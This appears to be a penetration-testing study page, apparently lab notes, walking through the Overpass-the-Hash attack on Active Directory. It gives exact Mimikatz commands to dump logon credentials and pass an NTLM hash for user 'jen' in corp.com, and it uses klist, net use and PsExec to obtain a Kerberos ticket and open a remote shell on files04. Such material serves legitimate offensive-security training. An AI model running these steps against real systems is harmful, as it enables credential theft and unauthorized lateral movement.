Overpass the Hash

shift + right click gives us the option to run the application as another user.

To execute this attack, the initial step involves acquiring the NTLM hash or password of the targeted user's account. Upon securing this information, a Ticket Granting Ticket (TGT) for the account can be obtained, allowing the attacker to access services or machines to which the user has permission.

Step-by-Step Guide for Generating TGT and Using Mimikatz:

Step 1: Run a Process Under the Target User (if Needed)

If the victim user has no processes running under their account, run a process as that user. This is to cache the credentials in memory for Mimikatz to retrieve.

Note: This step is primarily for demonstration or testing purposes and is not necessary in real-world scenarios where processes are already running under the user.

Step 2: Run Mimikatz to Fetch the User's Hash

Launch Mimikatz with elevated privileges (System or Administrative rights are required).
Execute the following commands within Mimikatz:

.\mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit"

Explanation:
- privilege::debug: Grants the necessary debug privileges.
- log: Saves output to a log file.
- sekurlsa::logonpasswords: Extracts credentials (including hashes) of users logged on to the system.
- exit: Exits Mimikatz.

Step 3: Collect the User's Hash

Identify and collect the NTLM hash for the target user from the Mimikatz output. For example:
```
NTLM: 369def79d8372408bf6e93364cc93075
```

Step 4: Generate a TGT Using Mimikatz

Use Mimikatz to generate a Kerberos Ticket Granting Ticket (TGT) for the account.
Run the following command:

.\mimikatz.exe "privilege::debug" "log" "sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell" "exit"

Explanation:
- sekurlsa::pth: Pass-the-hash technique to authenticate with the target NTLM hash.
- /user:jen: Specifies the target user.
- /domain:corp.com: Specifies the domain of the account.
- /ntlm:<hash>: Specifies the NTLM hash of the account.
- /run:powershell: Launches PowerShell with the generated TGT.

The hash should correspond to the user whose username you have mentioned. 😶

Step 5: Verify Cached Kerberos Tickets

In the PowerShell session that opens, check for cached Kerberos tickets:
```
klist
```
If no TGT is found, establish a connection with a network resource to generate the ticket:
```
net use \\files04
```
List the tickets again:
```
klist
```

Step 6: Use the Generated TGT to Access Resources

If the TGT is successfully generated, use it to access resources.
For example, use PsExec to run a command shell on a remote system:

.\PsExec.exe \\files04 cmd # Run in New Powershell created windows

PreviousPass the Hash NextPass The Ticket (PTT)

Last updated 1 year ago